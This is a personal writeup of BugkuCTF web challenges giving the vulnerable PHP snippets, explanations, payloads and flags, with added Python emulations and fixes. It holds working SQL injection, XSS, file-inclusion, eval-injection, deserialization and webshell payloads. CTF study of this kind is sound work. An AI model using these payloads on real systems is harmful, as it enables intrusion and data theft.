BugkuCTF WEB section writeups

writeup, ctf, web, 嘤嘤嘤 2018-04-18

0x00. Preface
This post is written only for myself.
It records the challenges I solved and what I learned from them.
If it never gets finished, so be it.


0x01. web2
Challenge text: they say clever people can always find the answer

Open the page source (F12); the key is sitting in the HTML.
KEY{Web-2-bugKssNNikls9100}


0x02. File upload test
Challenge text:
1. Please upload a PHP file
2. The uploaded file must not exceed 1M

Upload any PHP file and change the Content-Type of the file part to image/png (or image/jpeg, image/gif, ...). The server only checks the MIME type the client declares, which the client controls.
Flag:42e97d465f962c53df9549377b513c7e


0x03. Calculator

The input restriction is enforced only in client-side JS; edit it in the F12 devtools and submit the answer.
flag{CTF-bugku-0032}


0x04. web basics: $_GET

$what=$_GET['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

A plain GET request:

http://120.24.86.145:8002/get/?what=flag

flag:flag{bugku_get_su8kej2en}


0x05. web basics: $_POST

$what=$_POST['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

A plain POST request:
send what=flag in the POST body.
flag:flag{bugku_get_ssseint67se}


0x06. Contradiction (矛盾)

$num=$_GET['num'];
if(!is_numeric($num))
{
echo $num;
if($num==1)
echo 'flag{**********}';
}

is_numeric() rejects every well-formed numeric string, yet the loose comparison $num==1 still has to hold. Two kinds of string satisfy both on PHP 5/7:
1. Something that only looks like scientific notation: num=1e0.1. is_numeric() returns false, but == converts the string using its leading numeric part, 1e0 = 1.
2. A number with trailing letters: num=1a, converted to 1 the same way.
How == treats strings (PHP 5/7 rules, as documented in the manual): when a number is compared with a string, or two numeric strings are compared, the strings are converted to numbers and the comparison is numeric. A string becomes an int if it contains no '.', 'e' or 'E' and fits the integer range; in every other case it becomes a float. The start of the string decides its value: if it begins with valid numeric data that prefix is used, otherwise the value is 0.
Caveat: PHP 8 changed this. An int compared with a non-numeric string is now cast to a string and compared as strings, so both "1a"==1 and "1e0.1"==1 are false there; these payloads only work on older interpreters.
flag{bugku-789-ps-ssdf}
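To check the two payloads without a PHP interpreter, here is an added example (not code from the writeup) that emulates how PHP's == treats an int against a string under PHP 7 and PHP 8 rules. The numeric-string grammar is the manual's (whitespace, sign, digits, optional fraction and exponent; PHP 8 also tolerates trailing whitespace); the function names are mine.

```python
import re

# Numeric-string grammar: optional leading whitespace, sign, digits with an
# optional fraction, optional exponent. Trailing whitespace is handled below
# because PHP 7 and PHP 8 disagree about it.
_NUM = re.compile(r'[ \t\n\r\v\f]*[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?')
_WS = ' \t\n\r\v\f'


def numeric_prefix(s):
    """Return (value, kind) where kind is 'numeric', 'trailing-ws', 'leading'
    or 'none', following the longest numeric prefix of s."""
    m = _NUM.match(s)
    if not m:
        return 0.0, 'none'
    value = float(m.group(0))
    rest = s[m.end():]
    if rest == '':
        return value, 'numeric'
    if rest.strip(_WS) == '':
        return value, 'trailing-ws'      # numeric in PHP 8, leading-numeric in PHP 7
    return value, 'leading'              # e.g. "1a", "1e0.1"


def php_is_numeric(s, php8=False):
    """is_numeric($s): only a fully numeric string qualifies."""
    _, kind = numeric_prefix(s)
    return kind == 'numeric' or (php8 and kind == 'trailing-ws')


def php_loose_eq_int_str(n, s, php8=False):
    """Emulate `$n == $s` for an int $n and a string $s."""
    value, kind = numeric_prefix(s)
    if php8:
        # PHP 8: only a numeric string is compared as a number; for anything
        # else the int is cast to a string and the two strings are compared.
        if kind in ('numeric', 'trailing-ws'):
            return float(n) == value
        return str(n) == s
    # PHP 7: numeric and leading-numeric strings are converted to a number
    # (the latter with a notice); a string with no numeric prefix becomes 0.
    return float(n) == value
```

Both challenge payloads are rejected by php_is_numeric but accepted by php_loose_eq_int_str on PHP 7 and rejected on PHP 8, which is the whole bypass in two calls.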


0x07. web3

Dismiss the pop-ups and view the source in F12: the bottom of the HTML holds the flag as a run of numeric character references (&#NN;). A short script decodes them.

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import re

# Paste the run of &#NN; (or &#xNN;) references copied from the page source here.
s = '<numeric character references copied from the page source>'


def decode_entities(text):
    # Each reference carries one code point; decimal &#75; and hex &#x4B; both give 'K'.
    def repl(m):
        ref = m.group(1)
        return chr(int(ref[1:], 16)) if ref[0] in 'xX' else chr(int(ref))
    return re.sub(r'&#([xX][0-9a-fA-F]+|\d+);', repl, text)


print(decode_entities(s))

KEY{J2sa42ahJK-HS11III}


0x08. SQL injection

<meta charset="gb2312" />

The page source declares gb2312, which points at a wide-byte injection: the backslash (0x5c) that addslashes()/mysql_real_escape_string() place before a quote is swallowed into a two-byte GBK character when it follows a high byte such as %df, so the quote becomes live again.

?id=1%df%27 union select 1,database() %23                        #database name: sql5
?id=1%df%27 union select 1,string from sql5.key where id=1 %23    #reads the flag

KEY{54f3320dc261f313ba712eb3f13a1f6d}
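Why the %df byte neutralises the escaping, as an added example rather than code from the writeup: the server side (addslashes() plus a GBK-encoded connection) is emulated in Python, and the query string is then decoded the way MySQL would read it. The table and column names are the ones found above; the sample parameter is constructed.

```python
def addslashes(raw: bytes) -> bytes:
    """Byte-wise emulation of PHP addslashes(): a backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def build_query_gbk(id_param: bytes) -> str:
    """What MySQL sees when the connection charset is GBK (gb2312 superset).
    The escape byte 0x5c is a valid GBK trail byte, so 0xdf 0x5c is read as
    one CJK character and the quote that follows is no longer escaped."""
    sql = b"SELECT * FROM sql5.key WHERE id='" + addslashes(id_param) + b"'"
    return sql.decode('gbk', errors='replace')


def build_query_utf8(id_param: bytes) -> str:
    """Same bytes under a utf8mb4 connection: 0xdf cannot pair with 0x5c,
    so the backslash survives and the quote stays escaped."""
    sql = b"SELECT * FROM sql5.key WHERE id='" + addslashes(id_param) + b"'"
    return sql.decode('utf-8', errors='replace')


# Constructed sample: the URL-decoded form of ?id=1%df%27 union select ... %23
PAYLOAD = b"1\xdf' union select 1,string from sql5.key where id=1 #"
```

The real fix is not a different escaping function but a prepared statement, or at least setting the connection charset with mysqli_set_charset()/PDO's charset option so the escaper and the server agree on what a character is.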


0x09. DNS resolution (域名解析)
Challenge text: they say resolving flag.bugku.com to 120.24.86.145 gets you the flag

No DNS change is needed: the server picks its virtual host from the Host header. With the Firefox add-on Modify Header Value (HTTP headers), add Host: flag.bugku.com, open 120.24.86.145 and the flag is served (curl -H 'Host: flag.bugku.com' http://120.24.86.145 does the same).
KEY{DSAHDSJ82HDS2211}


0x10. SQL injection 1
Hint: keywords are filtered, can you get around it?

// SQL keyword filter
$array =     array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit');
foreach ($array as $value)
{
    if (substr_count($id, $value) > 0)
    {
        exit('包含敏感关键字!'.$value);
    }
}
// XSS filter
$id = strip_tags($id);
$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";

The keyword check runs on the raw input and strip_tags() only afterwards, so an empty tag <> inside each keyword defeats the check; strip_tags() then removes the tag and reassembles the keyword in the final query. (substr_count() is also case-sensitive while MySQL keywords are not, so UNION SELECT in upper case would pass even without the tag trick.)

?id=1 un<>ion sel<>ect 1,database() %23                                   #database name: sql3
?id=1 un<>ion sel<>ect 1,hash fr<>om sql3.key wh<>ere id=1 %23            #reads the flag

KEY{c3d3c17b4ca7f791f85e#$1cc72af274af4adef}


0x11. You have to make it stop (你必须让他停下)

The page keeps reloading. View the source and keep pressing F5 (or intercept the responses in a proxy) until the response that contains the flag comes by.

flag{dummy_game_1s_s0_popular}


0x12. Local include (本地包含)

 <?php
     include "flag.php";
     $a = @$_REQUEST['hello'];
     eval( "var_dump($a);");
     show_source(__FILE__);
 ?> 

eval("var_dump($a);") interpolates our input straight into PHP source, so we can close var_dump( and append our own statement, commenting out the rest:

hello=);print_r(file("./flag.php")); //      → eval("var_dump();print_r(file(\"./flag.php\")); //);")

A tidier variant is hello=file('flag.php'), which keeps var_dump() a valid call: eval("var_dump(file('flag.php'));"). Either way the source of flag.php, flag included, is dumped.

flag{bug-ctf-gg-99}


0x13. Variable 1 (变量1)

<?php  
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){
        die("args error!");
    }
    eval("var_dump($$args);");
}
?>

The regex allows only \w characters, so no $, quotes or parentheses, but eval("var_dump($$args);") dereferences a variable whose name we choose. Passing the name of a superglobal works:
$GLOBALS is available from anywhere in a PHP script (inside functions and methods too).
PHP keeps every global variable in the array $GLOBALS[index], where the variable's name is the key, so dumping it also dumps the variable flag1.php defined.

?args=GLOBALS

flag{92853051ab894a64f7865cf3c2128b34}


0x14. web5

The page source contains a block of JSFuck; paste it into the F12 console and it evaluates to the flag.

CTF{WHATFK}


0x15. First class (头等舱)

Intercept the request; the flag is in the response, not in the rendered page.

flag{Bugku_k8_23s_istra}


0x16. web4
Challenge text: take a look at the source

var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62';
var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b';
eval(unescape(p1) + unescape('%35%34%61%61%32' + p2));

The eval() runs unescape(p1) + unescape('%35%34%61%61%32' + p2), i.e. p1 + %35%34%61%61%32 + p2 URL-decoded. Decode it with a script or any online URL decoder.

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from urllib.parse import unquote

s='%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62%35%34%61%61%32%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b'
print(unquote(s))

Decoding yields another script.

function checkSubmit()
{
    var a=document.getElementById("password");
    if("undefined"!=typeof a)
    {
        if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value)
            return!0;
        alert("Error");
        a.focus();
        return!1
    }
}
document.getElementById("levelQuest").onsubmit=checkSubmit;

The check is if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value): submit 67d709b2b54aa2aa648cf6e87a7114f1 as the password to get the flag.

KEY{J22JK-HS11}


0x17. The flag is in index (flag在index里)

The URL carries a file parameter, which together with the title suggests local file inclusion. Including index.php would just execute it, so read it through the php://filter wrapper, which returns the source base64-encoded instead:

?file=php://filter/read=convert.base64-encode/resource=index.php

Decoding the base64 shows the flag.

flag{edulcni_elif_lacol_si_siht}


0x18. Enter the password to view the flag (输入密码查看flag)

Intercept the request and brute-force the five-digit password with Burp Suite Intruder.

13579 returns the flag.

flag{bugku-baopo-hah}


0x19. Click a million times (点击一百万下)

The counter is plain client-side JS; POST clicks=1000000 directly and the flag comes back.

flag{Not_C00kI3Cl1ck3r}


0x20. Backups are a good habit (备份是个好习惯)

Guessing at source leakage: requesting index.php.bak returns the source.

<?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
*/

include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
    echo $flag."取得flag";
}
?>

The code deletes the word key from the query string, but str_replace() makes a single pass rather than looping, so kkeyey collapses to key after the replacement. md5() of an array returns NULL (with a warning) on PHP 5/7, so two different arrays satisfy md5($key1) == md5($key2) while $key1 !== $key2 still holds. (On PHP 8 md5(array) throws a TypeError; there the magic-hash string pair QNKCDZO / 240610708 used in later challenges still works.)

?kkeyey1[]=a&kkeyey2[]=b

Bugku{OH_YOU_FIND_MY_MOMY}
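Both this challenge and "sql注入1" above fail for the same reason: the sanitiser is applied in the wrong order or only once, and the string that reaches the dangerous sink is not the string that was checked. This added example (mine, not from the writeup) emulates both filters in Python next to the ordering and fixed-point loop that close the hole; strip_tags() is approximated by deleting <...> runs, which is enough for the un<>ion style input.

```python
import re

BLACKLIST = ('table', 'union', 'and', 'or', 'load_file', 'create', 'delete',
             'select', 'update', 'sleep', 'alter', 'drop', 'truncate', 'from',
             'max', 'min', 'order', 'limit')


def strip_tags(s):
    """Approximation of PHP strip_tags(): drop every <...> run."""
    return re.sub(r'<[^>]*>', '', s)


def filter_then_strip(id_param):
    """The challenge's order: keyword check on the raw string, then strip_tags().
    Returns the string that reaches the query, or None when blocked."""
    for word in BLACKLIST:
        if word in id_param:                  # substr_count() is case-sensitive
            return None
    return strip_tags(id_param)


def strip_then_filter(id_param):
    """Hardened order: normalise first, then check the string that will be used,
    case-insensitively because SQL keywords are."""
    cleaned = strip_tags(id_param)
    lowered = cleaned.lower()
    for word in BLACKLIST:
        if word in lowered:
            return None
    return cleaned


def remove_key_once(s):
    """str_replace('key', '', $str): one pass, so 'kkeyey' becomes 'key'."""
    return s.replace('key', '')


def remove_key_fixpoint(s):
    """Repeat until nothing changes, so removed pieces cannot reassemble."""
    while True:
        stripped = s.replace('key', '')
        if stripped == s:
            return s
        s = stripped
```

A blacklist plus a fixed-point loop is still weaker than parameterised queries or a strict allow-list (digits only for an id), but if a blacklist must exist, checking the normalised value is the minimum.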


0x21. Report card (成绩单)

The original query returns 4 columns (union select 1,1,1,x lines up) and the last one is echoed, so the data goes there. Then walk information_schema:

database name   skctf_flag
id=' union select 1,1,1,group_concat(schema_name) from information_schema.SCHEMATA#
table name   fl4g
id=' union select 1,1,1,group_concat(table_name) from information_schema.TABLES where table_schema='skctf_flag'#
column name   skctf_flag
id=' union select 1,1,1,group_concat(column_name) from information_schema.COLUMNS where table_name='fl4g'#
flag
id=' union select 1,1,1,group_concat(skctf_flag) from fl4g #

BUGKU{Sql_INJECT0N_4813drd8hz4}


0x22. Akina Mountain driver (秋名山老司机)

The page shows an arithmetic expression and wants its value POSTed as value within a couple of seconds. Pull the expression out with a regex, compute it and post it back on the same session, because the server ties the expected answer to the cookie it set.

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import re
import requests

url = 'http://120.24.86.145:8002/qiumingshan/'
s = requests.Session()             # same session: the answer is bound to the cookie
r = s.get(url)
# the page carries the challenge as <div>expression=?;</div>
expr = re.search(r'<div>(.+?)=\?;</div>', r.text).group(1)
# eval() on text from a remote server is acceptable only because this is a CTF target we chose
data = {'value': eval(expr)}
r = s.post(url, data=data)
print(r.text)

It may take a few runs before the flag shows up.
Bugku{YOU_DID_IT_BY_SECOND}


0x23. Be fast (速度要快)

Intercept: the response header flag carries a value that is base64-encoded twice (the outer decode yields text ending in ': <base64>'). The hint says to POST that inner value as margin. It changes on every request and has to come back quickly on the same session, so script it.

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import base64
import requests

url = 'http://120.24.86.145:8002/web6/'
s = requests.Session()
r = s.get(url)
outer = base64.b64decode(r.headers['flag']).decode()              # '...: <base64>'
margin = base64.b64decode(outer.split(':')[1].strip()).decode()   # the value to post
print(s.post(url, data={'margin': margin}).text)

If it keeps failing, run it from a faster machine (or closer to the target).
KEY{111dd62fcd377076be18a}


0x24. Cookie spoofing (cookies欺骗)

The URL carries a base64 string that decodes to keys.txt.
Replacing it with the encoding of index.php gives no output at first.
The URL has a second parameter, line; setting it (e.g. line=1) prints one line, so loop over line to dump the source.

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

s = requests.Session()
# aW5kZXgucGhw is base64('index.php'); the server returns one line of the file per index
for i in range(0, 40):
    print(s.get('http://120.24.86.145:8002/web11/index.php?line=%d&filename=aW5kZXgucGhw' % i).text)

Recovered source:

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
    '0' =>'keys.txt',
    '1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
    $file_list[2]='keys.php';
}
if(in_array($file, $file_list)){ 
    $fa = file($file);
    echo $fa[$line];
}
?>

keys.php is only added to the allow-list when the cookie margin=margin is present. Send filename=a2V5cy5waHA= (base64 of keys.php) together with Cookie: margin=margin, iterate line again, and the flag appears.

KEY{key_keys}


0x25. XSS

Page source:

var s="";    document.getElementById('s').innerHTML = s;

(Passing the value through a parameter named id is an odd choice, but that is the sink: the parameter is reflected inside the JS string literal and then written with innerHTML.)

?id=<script>alert(key)</script>

< and > are filtered.
The value lands inside a JavaScript string, though, so JS unicode escapes pass the filter untouched and the engine decodes them before innerHTML ever sees the string:

?id=\u003cscript\u003ealert(_key_)\u003c/script\u003e

Flag:17f094325e90085b30a5ddefce34acd8
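To make the context mismatch concrete, here is an added example (mine, not the challenge's code) that emulates the server's filter and the JavaScript string literal in Python: the raw tag is blocked, the \u003c form is not, and decoding the literal the way the engine does gives the tag back. The template and the blocked characters are assumptions about the challenge. One caveat for anyone reusing the payload: browsers do not execute <script> elements inserted through innerHTML, so outside this challenge an event-handler payload such as an <img> with onerror is what actually fires.

```python
import html

# Assumed server template: the parameter is dropped into a JS string literal.
TEMPLATE = 'var s="{value}";    document.getElementById(\'s\').innerHTML = s;'


def render(id_param):
    """The challenge's filter: reject raw angle brackets, then reflect."""
    if '<' in id_param or '>' in id_param:
        raise ValueError('blocked by filter')
    return TEMPLATE.format(value=id_param)


def js_string_value(page):
    """What the JS engine assigns to s: \\uXXXX escapes are decoded."""
    literal = page.split('var s="', 1)[1].split('";', 1)[0]
    return literal.encode('latin-1').decode('unicode_escape')


def js_escape(s):
    """Escape for a JS string literal: every non-alphanumeric char as \\uXXXX (BMP)."""
    return ''.join(c if c.isalnum() else '\\u%04x' % ord(c) for c in s)


def render_safe(id_param):
    """Encode for both contexts the value passes through: HTML-escape for the
    innerHTML sink, then JS-escape for the string literal it is embedded in."""
    return TEMPLATE.format(value=js_escape(html.escape(id_param, quote=True)))
```

The filter on the raw parameter is not the fix; each context the value crosses (JS literal, then HTML via innerHTML) needs its own encoding, or the sink should be textContent instead of innerHTML.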


0x26. never give up

The page source hints at 1p.html.
Fetching it and looking at the response in a proxy shows an odd string:

<!--
var Words ="%3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21--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%3D%3D--%3E" 
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
} 
OutWord();
// -->

Decode it with a script.

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import base64
from urllib.parse import unquote

s='%3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21--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%3D%3D--%3E'
print(unquote(s))
s='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'
print(base64.b64decode(s).decode())
s='%22%3Bif%28%21%24_GET%5B%27id%27%5D%29%0A%7B%0A%09header%28%27Location%3A%20hello.php%3Fid%3D1%27%29%3B%0A%09exit%28%29%3B%0A%7D%0A%24id%3D%24_GET%5B%27id%27%5D%3B%0A%24a%3D%24_GET%5B%27a%27%5D%3B%0A%24b%3D%24_GET%5B%27b%27%5D%3B%0Aif%28stripos%28%24a%2C%27.%27%29%29%0A%7B%0A%09echo%20%27no%20no%20no%20no%20no%20no%20no%27%3B%0A%09return%20%3B%0A%7D%0A%24data%20%3D%20@file_get_contents%28%24a%2C%27r%27%29%3B%0Aif%28%24data%3D%3D%22bugku%20is%20a%20nice%20plateform%21%22%20and%20%24id%3D%3D0%20and%20strlen%28%24b%29%3E5%20and%20eregi%28%22111%22.substr%28%24b%2C0%2C1%29%2C%221114%22%29%20and%20substr%28%24b%2C0%2C1%29%21%3D4%29%0A%7B%0A%09require%28%22f4l2a3g.txt%22%29%3B%0A%7D%0Aelse%0A%7B%0A%09print%20%22never%20never%20never%20give%20up%20%21%21%21%22%3B%0A%7D%0A%0A%0A%3F%3E'
print(unquote(s))

The final layer is:

";if(!$_GET['id'])
{
    header('Location: hello.php?id=1');
    exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
    echo 'no no no no no no no';
    return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and    eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
    require("f4l2a3g.txt");
}
else
{
    print "never never never give up !!!";
}
?>

file_get_contents($a) is satisfied with a=php://input and the expected sentence as the POST body.
eregi() is not binary-safe, so a %00 truncates it: with b=%001114, strlen($b)>5 holds, substr($b,0,1) is "\0" (loosely != 4), and the NUL ends the pattern "111\0" so it still matches "1114". id=%00 keeps $_GET['id'] truthy for the redirect check while $id==0 still holds under loose comparison. eregi() was removed in PHP 7, so this part only works on PHP 5.
payload: id=%00&a=php://input&b=%001114
postdata: bugku is a nice plateform!
But f4l2a3g.txt can simply be requested directly and gives the flag as well. ??????????wtf
flag{tHis_iS_THe_fLaG}


0x27. welcome to bugkuctf

View the source with F12.

<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  

if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
 -->  

Same trick as before:
file_get_contents is bypassed with txt=php://input and the sentence as the POST body,
and the included file is read through php://filter, starting with hint.php:
payload:?txt=php://input&file=php://filter/read=convert.base64-encode/resource=hint.php
postdata:welcome to the bugkuctf
Decoding the base64 gives the source.

<?php  
class Flag{//flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("good");
        }  
    }  
}  
?>  

That confirms the payload works.
Reading index.php the same way gives the complete source of the challenge.

<?php  
class Flag{//flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("good");
        }  
    }  
}  
?>  
<?php  
$txt = $_GET["txt"];  
$file = $_GET["file"];  
$password = $_GET["password"];  

if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){  
    echo "hello friend!<br>";  
    if(preg_match("/flag/",$file)){ 
            echo "不能现在就给你flag哦";
        exit();  
    }else{  
        include($file);   
        $password = unserialize($password);  
        echo $password;  
    }  
}else{  
    echo "you are not the number of bugku ! ";  
}  
?>  
<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  

if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
--->  

Key pieces:

if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
----------------------------------------------
if(preg_match("/flag/",$file)){ 
            echo "不能现在就给你flag哦";
        exit();  
    }else{  
        include($file);   
        $password = unserialize($password);  
        echo $password;
--------------------------------------------
<?php  
class Flag{//flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("good");
        }  
    }  
}  
?>  

First block: with txt=php://input and the POST body welcome to the bugkuctf we get past the gate and reach the code that unserializes $password.
Second block: file is rejected whenever it contains "flag", so flag.php cannot be included directly; hint.php, which defines class Flag, can be. After the include, $password is unserialized and echoed, and echoing an object calls its __tostring().
Third block: Flag::__tostring() does file_get_contents() on whatever $file holds, so a serialized Flag with file=flag.php is the gadget; the preg_match only looks at $file, not at $password.
payload:?txt=php://input&file=hint.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
postdata:welcome to the bugkuctf
flag{php_is_the_best_language}


0x28. One-liner past the dog (过狗一句话)

The s parameter is evaluated as PHP (a one-line webshell). Functions that print values:

print_r
var_dump
show_source

Functions that list files:

glob()
scandir()

PHP function names are case-insensitive, so Scandir() below is scandir() to the interpreter even though a case-sensitive WAF signature may not match it. So:

?s=var_dump(glob('*.txt'))
array(7) { [0]=> string(7) "123.txt" [1]=> string(5) "a.txt" [2]=> string(8) "flag.txt" [3]=> string(7) "ldl.txt" [4]=> string(10) "olivia.txt" [5]=> string(12) "testfile.txt" [6]=> string(16) "zaizheliflag.txt" } 坑爹的题目,To JBfei!
---------------------------------------------------------------------------------------------
?s=var_dump(glob('*.php'))
array(27) { [0]=> string(5) "1.php" [1]=> string(5) "2.php" [2]=> string(5) "3.php" [3]=> string(5) "4.php" [4]=> string(5) "5.php" [5]=> string(5) "a.php" [6]=> string(5) "c.php" [7]=> string(11) "chaoba1.php" [8]=> string(11) "chaoba2.php" [9]=> string(8) "ddee.php" [10]=> string(5) "f.php" [11]=> string(5) "h.php" [12]=> string(8) "haha.php" [13]=> string(9) "index.php" [14]=> string(6) "ll.php" [15]=> string(11) "loshell.php" [16]=> string(11) "oudeniu.php" [17]=> string(11) "phpspy1.php" [18]=> string(5) "q.php" [19]=> string(6) "t2.php" [20]=> string(9) "txxxc.php" [21]=> string(5) "x.php" [22]=> string(6) "xb.php" [23]=> string(8) "xxoo.php" [24]=> string(9) "xxoos.php" [25]=> string(7) "xxx.php" [26]=> string(6) "zx.php" } 坑爹的题目,To JBfei!
---------------------------------------------------------------------------------------------
?s=var_dump(Scandir('./'))
array(44) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(5) "1.php" [3]=> string(7) "123.txt" [4]=> string(5) "2.php" [5]=> string(5) "3.php" [6]=> string(5) "4.php" [7]=> string(5) "5.php" [8]=> string(11) " string(21) " string(22) " string(13) "README.README" [12]=> string(5) "a.php" [13]=> string(5) "a.txt" [14]=> string(5) "c.php" [15]=> string(6) "chaoba" [16]=> string(11) "chaoba.aspx" [17]=> string(11) "chaoba1.php" [18]=> string(11) "chaoba2.php" [19]=> string(4) "conn" [20]=> string(8) "ddee.php" [21]=> string(6) "f.html" [22]=> string(5) "f.php" [23]=> string(8) "flag.txt" [24]=> string(5) "h.php" [25]=> string(8) "haha.php" [26]=> string(9) "index.php" [27]=> string(7) "ldl.txt" [28]=> string(6) "ll.php" [29]=> string(11) "loshell.php" [30]=> string(10) "olivia.txt" [31]=> string(11) "oudeniu.php" [32]=> string(11) "phpspy1.php" [33]=> string(5) "q.php" [34]=> string(6) "t2.php" [35]=> string(12) "testfile.txt" [36]=> string(9) "txxxc.php" [37]=> string(5) "x.php" [38]=> string(6) "xb.php" [39]=> string(8) "xxoo.php" [40]=> string(9) "xxoos.php" [41]=> string(7) "xxx.php" [42]=> string(16) "zaizheliflag.txt" [43]=> string(6) "zx.php" } 坑爹的题目,To JBfei!

payload:?s=show_source('flag.txt')
BUGKU{bugku_web_009801_a}


0x29. Characters? Regex? (字符?正则?)

Satisfy the regular expression.

 <?php 
 highlight_file('2.php');
 $key='KEY{********************************}';
 $IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
 if( $IM ){ 
   die('key is: '.$key);
 }
 ?>

My regex skills are rusty, so here is a senior's breakdown, quoted as is.

  1. Literal characters in the expression are matched as written, e.g. key
  2. "." stands for any character
  3. "*" stands for the number of times a character or sequence repeats, i.e. the preceding character repeated any number of times, which may be 0; also "^" marks the start and "$" the end
  4. "\/" stands for "/", an escape, because a bare / marks the start and end of the regex
  5. [a-z] stands for any one character from a to z
  6. [[:punct:]] stands for any one character from the punctuation set; remember, symbols
  7. /i means case-insensitive
  8. {4,7} means the preceding item appears 4 to 7 times in a row
  9. \s matches any whitespace character
  10. \d matches a digit
  11. \b matches the start or end of a word

payload:?id=keykekeykeykeykey:/k/kekeya[:]

flag:KEY{0x0SIOPh550afc}


0x30. Ex-girlfriend (前女友, SKCTF)

<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
        if(!strcmp($v3, $flag)){
            echo $flag;
        }
    }
}
?>

